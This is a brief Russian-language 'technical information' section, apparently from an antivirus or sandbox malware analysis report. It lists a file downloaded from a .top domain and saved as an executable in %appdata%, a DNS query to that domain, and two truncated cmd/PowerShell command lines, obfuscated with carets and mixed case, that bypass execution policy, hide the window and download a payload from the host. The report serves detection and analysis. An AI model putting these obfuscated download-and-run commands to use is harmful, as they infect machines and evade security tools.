Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Ow^eRsHE^Ll.E^x^e -eXEcUT^iO^Np^OL^iC^y^ bypA^ss -NO^PrO^fIlE^ -WInD^oW^styLe HidDE^n ^(Ne^W-o^bJ^Ect SYSTeM.n^e^t.^webclienT).^Dow^Nloadfi^Le('http://toagoores.top/read.ph...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "P^Ow^eRsHE^Ll.E^x^e -eXEcUT^iO^Np^OL^iC^y^ bypA^ss -NO^PrO^fIlE^ -WInD^oW^styLe HidDE^n ^(Ne^W-o^bJ^Ect SYSTeM.n^e^t.^webclienT).^Dow^Nloadfi^Le('http://toagoores.top/read.ph...' (со скрытым окном)